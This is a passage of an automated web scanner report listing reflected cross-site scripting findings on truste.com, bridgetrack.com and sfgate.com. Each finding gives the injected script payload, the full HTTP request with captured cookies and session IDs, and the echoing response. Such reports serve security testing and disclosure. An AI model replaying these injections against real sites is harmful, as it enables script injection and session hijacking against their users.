Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4521

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont312bed<script>alert(1)</script>657c9c8ac64_ib = '<div id="te-clr1-att02cont312bed<script>
...[SNIP]...

2.80. http://choices.truste.com/ca [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 1ab07<script>alert(1)</script>2b4bc84e310 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=901ab07<script>alert(1)</script>2b4bc84e310&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':901ab07<script>alert(1)</script>2b4bc84e310,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3'
...[SNIP]...

2.81. http://choices.truste.com/ca [iplc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 5dcf7<script>alert(1)</script>0dff6bed2f2 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr5dcf7<script>alert(1)</script>0dff6bed2f2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr5dcf7<script>alert(1)</script>0dff6bed2f2','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.82. http://choices.truste.com/ca [ox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload a5026<script>alert(1)</script>0da41057215 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20a5026<script>alert(1)</script>0da41057215&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20a5026<script>alert(1)</script>0da41057215,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','notice
...[SNIP]...

2.83. http://choices.truste.com/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 65ea8<script>alert(1)</script>598988d2f3e was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr65ea8<script>alert(1)</script>598988d2f3e&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr65ea8<script>alert(1)</script>598988d2f3e','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://
...[SNIP]...

2.84. http://choices.truste.com/ca [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload a1186<script>alert(1)</script>6258efe9a53 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728a1186<script>alert(1)</script>6258efe9a53&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728a1186<script>alert(1)</script>6258efe9a53,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':
...[SNIP]...

2.85. http://choices.truste.com/ca [zi parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 3dd0a<script>alert(1)</script>3c9fc761429 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=100023dd0a<script>alert(1)</script>3c9fc761429&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709117/direct;wi.728;hi.90/01/957876586?click=http://at.atwola.com/adlink/5113/675330/0/225/AdId=1661022;BnId=1;itime=957876586;kvpg=247wallst%2F2011%2F05%2F06%2Fanticipating%2Dthe%2Dcitigro;kvugc=0;kvmn=93241891;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:56281:50086:50085:53380:60490:60512:57149:50963:52615:60491:50507:53656:55401:60509:54255:60506:57094:54243:50961:54209:52841:51182:56419:56673:60146:56780:56969:56835:56232;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont3_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'100023dd0a<script>alert(1)</script>3c9fc761429','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.86. http://citi.bridgetrack.com/a/s/ [BT_PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ae1cc%3balert(1)//8bd16c696b3 was submitted in the BT_PID parameter. This input was echoed as ae1cc;alert(1)//8bd16c696b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a/s/?BT_PID=232720ae1cc%3balert(1)//8bd16c696b3&BT_CON=1&BT_PM=1&r=0.0318853675853461&_u=visitor&_d=http://www.citibank.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citibank.com/us/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; AdData=S1C=1&S1T=201105091217590859&S1=99156z232719; ASB9=TX=1304957880&Pb=3&A=8&SID=06C6E082513B497D9069D000CF8BD65F&Vn=271&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=91835&Cr=99156&W=48543&Tr=48543&Cp=4112&P=232719&B=9; CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45; ATV9=7246d163CV8c1c40Gc738Fc3c8Fc30QKc2PLRcc1FCVc8ccc1FCVccccc; CitiBTSES=SID=F038A454DD2042A4BC0568165BBBF5C3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 08 May 2011 16:19:03 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: AdData=S2C=1&S1=99156z232719&S1T=201105091217590859&S2T=201105091219030890&S2=95350z232720&S1C=1; expires=Fri, 08-Jul-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=F038A454DD2042A4BC0568165BBBF5C3; path=/
Date: Mon, 09 May 2011 16:19:03 GMT
Connection: close
Content-Length: 2682

var bt_ad_content232720ae1cc;alert(1)//8bd16c696b3=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset
...[SNIP]...

2.87. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949a5"%3balert(1)//ae5d172cef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949a5";alert(1)//ae5d172cef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a/s/?BT_PID=232721&BT_CON=1&BT_PM=1&r=0.6791971593629569&_u=visitor&_d=http://www.citibank.com&949a5"%3balert(1)//ae5d172cef0=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citibank.com/us/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=; ASB9=TX=1304957880&Pb=3&A=8&SID=06C6E082513B497D9069D000CF8BD65F&Vn=271&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=91835&Cr=99156&W=48543&Tr=48543&Cp=4112&P=232719&B=9; ATV9=7246d163CV8c1c40Gc738Fc3c8Fc30QKc2PLRcc1FCVc8ccc1FCVccccc; CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45; AdData=S2C=1&S1=99156z232719&S1T=201105091217590859&S2T=201105091218010301&S2=95350z232720&S1C=1; CitiBTSES=SID=F038A454DD2042A4BC0568165BBBF5C3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sun, 08 May 2011 16:19:12 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV10=48856d163D1Hc1c3T9c738Hc3c8Fc2E25cMQLcc36Lc8ccc36Lccccc; expires=Tue, 24-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC10=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: AdData=S3C=1&S1C=1&S2=95350z232720&S2T=201105091218010301&S1T=201105091217590859&S1=99156z232719&S3T=201105091219120665&S3=79941z232721&S2C=1; expires=Fri, 08-Jul-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Set-Cookie: ASB10=TX=1304957953&Pb=3&A=8&SID=E5B38E0DBBD34A26930FDC2F34AAF0FF&Vn=271&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=23381&Cr=79941&W=3285&Tr=3285&Cp=4009&P=232721&B=10; expires=Tue, 24-May-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=F038A454DD2042A4BC0568165BBBF5C3; path=/
Date: Mon, 09 May 2011 16:19:11 GMT
Connection: close
Content-Length: 2716

var bt_ad_content232721=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
edgesuite.net/assets/81248/CBOL CA TypeB 218x88 BoySunglasses.gif";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=205816&BT_SID=83099&_u=visitor&949a5";alert(1)//ae5d172cef0=1";var lf="lid=ILC-5060802&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D205816%26BT%5FSID%3D83099%26%5Fu%3Dvisitor%26949a5%22%3Balert%281%29%2F%2Fae5d172cef
...[SNIP]...

2.88. http://contribute.sfgate.com/ver1.0/Direct/Jsonp [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 96f43<script>alert(1)</script>285f9cf9945 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?sid=my.sfgate.com&r=%7B%22Requests%22%3A%5B%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22%2Fc%2Fa%2F2011%2F05%2F08%2FMN561I5MQC.DTL%22%7D%7D%2C%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22%2Fc%2Fa%2F2011%2F05%2F06%2FMNPC1JCM9F.DTL%22%7D%7D%2C%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22%2Fc%2Fa%2F2011%2F05%2F06%2FMNI11JD0F2.DTL%22%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback096f43<script>alert(1)</script>285f9cf9945 HTTP/1.1
Host: contribute.sfgate.com
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1304957801741720; anonId=89d31f58-e848-44c2-9e78-e7b148a78e6a; comment_sort_order=TimeStampDescending; s_pers=%20rvd%3D1304957813585%253E0%253A1%7C1305044213585%3B%20rvd_s%3D1%7C1304959613585%3B%20rvw%3D1304957813591%253E0%253A1%7C1305562613591%3B%20rvw_s%3D1%7C1304959613591%3B%20rvm%3D1304957813601%253E0%253A1%7C1307549813601%3B%20rvm_s%3D1%7C1304959613601%3B%20rvq%3D1304957813607%253E0%253A1%7C1312733813607%3B%20rvq_s%3D1%7C1304959613607%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comments_per_page=10; s_vi=[CS]v1|26E409C405161FA3-600001A0A050DABF[CE]; _jsuid=2350901234016438271; __gads=ID=5822a16bcef5d06e:T=1304957833:S=ALNI_MatbnnwpFP284AUG1NDClOmox8VEw; ASP.NET_SessionId=3lkwx1zfssc1d232lsj4c3zh; SiteLifeHost=l3vm189l3pluckcom

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm189l3pluckcom
Set-Cookie: SiteLifeHost=l3vm189l3pluckcom; domain=sfgate.com; path=/
Date: Mon, 09 May 2011 16:20:55 GMT
Content-Length: 2094

RequestBatch.callbacks.daapiCallback096f43<script>alert(1)</script>285f9cf9945({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"05/09/2011 09:20:54:833 AM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"/c/a/2011/05/08/MN561I5MQC.DTL"},"Section":{"Name":"articles"},
...[SNIP]...

2.89. http://contribute.sfgate.com/ver1.0/sys/jsonp.app [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://contribute.sfgate.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload cabed<script>alert(1)</script>17c242f2f00 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

